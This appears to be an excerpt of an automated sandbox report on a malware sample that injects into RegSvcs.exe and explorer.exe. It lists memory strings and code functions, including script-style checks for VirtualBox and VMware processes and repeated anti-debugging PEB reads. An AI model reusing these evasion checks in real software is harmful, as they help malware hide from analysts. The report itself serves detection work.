0000000F.00000003.1796647501.0000000001720000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
                Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
                Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.execroso8
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237897485.0000000000D9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe") Then"
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
                Source: dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then*
                Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1797532272.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797392869.00000000016CF000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1797445114.00000000016D0000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1874703095.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2290624750.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2287052991.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2269210588.0000000000D8D000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000015.00000003.2283430406.0000000000D93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: explorer.exe, 00000020.00000002.3833424525.00000000088BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: tdggoffi.bin.7.dr, tdggoffi.bin.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
                Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: dmqiuorkt.mp2.exe, 00000015.00000003.1979898615.0000000000D95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then
Source: dmqiuorkt.mp2.exe, 00000015.00000003.2319105234.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rocessExists("VboxService.exe") Then
Source: dmqiuorkt.mp2, 00000007.00000003.1518830857.0000000001015000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1624388643.0000000001019000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VBoxTray.exe") Then6a
Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareService.exe637D6S|
Source: explorer.exe, 00000020.00000000.3686304398.0000000007065000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000020.00000000.3696594073.000000000888E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
Source: dmqiuorkt.mp2, 00000007.00000003.1625474319.000000000106F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe8
Source: dmqiuorkt.mp2, 00000007.00000003.1518771568.0000000001004000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenl
Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenk
Source: wscript.exe, 00000002.00000003.1532507557.0000000000A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00aw
Source: tdggoffi.bin.0.dr | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then]
Source: dmqiuorkt.mp2.exe, 00000012.00000003.2268745257.0000000000D10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe%
Source: UserAccountControlSettings.exe, 00000016.00000002.3767740843.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: dmqiuorkt.mp2.exe, 00000012.00000003.1864447952.0000000000CA4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then%w
Source: dmqiuorkt.mp2.exe, 00000015.00000003.2237721841.0000000000D97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTVMWare
Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1701801021.00000000016D5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If ProcessExists("VboxService.exe") Thenl
Source: dmqiuorkt.mp2.exe, 00000015.00000003.2319105234.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: explorer.exe, 00000020.00000002.3833424525.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
Source: dmqiuorkt.mp2.exe, 0000000F.00000003.1796366979.000000000171A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VboxService.exe
Source: explorer.exe, 00000020.00000000.3681032717.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | API call chain: ExitProcess graph end node | graph_0-30220
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\UserAccountControlSettings.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A0096E rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_00417D83 LdrLoadDll
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008CF3FF BlockInput
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_00266878 IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_00855D78 GetVersionExW, GetCurrentProcess, IsWow64Process, LoadLibraryA, GetProcAddress, GetNativeSystemInfo, FreeLibrary, GetSystemInfo, GetSystemInfo
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_0026ECAA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_00875078 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BA197 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A00185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A64180 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A7C188 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A4019F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A961E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019F01F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A861C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A3E1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A3E1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019F0124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A80115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6A118 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C6154 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BC156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A94164 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A54144 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A54144 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A58158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A580A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A860B8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A860B8 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019B80A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A460E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A020F0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BC0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BA0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A420DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019DE016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A56030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A44000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A62000 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BA020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BC020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C2050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019EC073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A46050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019B8397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019E438F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BE388 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019CA3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C83C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019F63FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A463C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A7C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019DE3F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A643D4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019D03E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BC310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A98324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A98324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019E0310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019FA30B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A6437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A9634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A42349 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A68350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A4035C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A4035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A8A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A562A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A562A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019FE284 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A40283 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019D02A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019CA2C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019D02E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A962D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019B823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019C6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_019BA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A70274 mov eax, dword ptr fs:[00000030h]14_2_01A70274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A48243 mov eax, dword ptr fs:[00000030h]14_2_01A48243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A48243 mov ecx, dword ptr fs:[00000030h]14_2_01A48243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B826B mov eax, dword ptr fs:[00000030h]14_2_019B826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A9625D mov eax, dword ptr fs:[00000030h]14_2_01A9625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A250 mov eax, dword ptr fs:[00000030h]14_2_01A7A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A250 mov eax, dword ptr fs:[00000030h]14_2_01A7A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4260 mov eax, dword ptr fs:[00000030h]14_2_019C4260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE59C mov eax, dword ptr fs:[00000030h]14_2_019FE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A405A7 mov eax, dword ptr fs:[00000030h]14_2_01A405A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F4588 mov eax, dword ptr fs:[00000030h]14_2_019F4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2582 mov eax, dword ptr fs:[00000030h]14_2_019C2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C2582 mov ecx, dword ptr fs:[00000030h]14_2_019C2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E45B1 mov eax, dword ptr fs:[00000030h]14_2_019E45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E45B1 mov eax, dword ptr fs:[00000030h]14_2_019E45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C65D0 mov eax, dword ptr fs:[00000030h]14_2_019C65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA5D0 mov eax, dword ptr fs:[00000030h]14_2_019FA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA5D0 mov eax, dword ptr fs:[00000030h]14_2_019FA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE5CF mov eax, dword ptr fs:[00000030h]14_2_019FE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE5CF mov eax, dword ptr fs:[00000030h]14_2_019FE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC5ED mov eax, dword ptr fs:[00000030h]14_2_019FC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC5ED mov eax, dword ptr fs:[00000030h]14_2_019FC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE5E7 mov eax, dword ptr fs:[00000030h]14_2_019EE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C25E0 mov eax, dword ptr fs:[00000030h]14_2_019C25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE53E mov eax, dword ptr fs:[00000030h]14_2_019EE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56500 mov eax, dword ptr fs:[00000030h]14_2_01A56500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
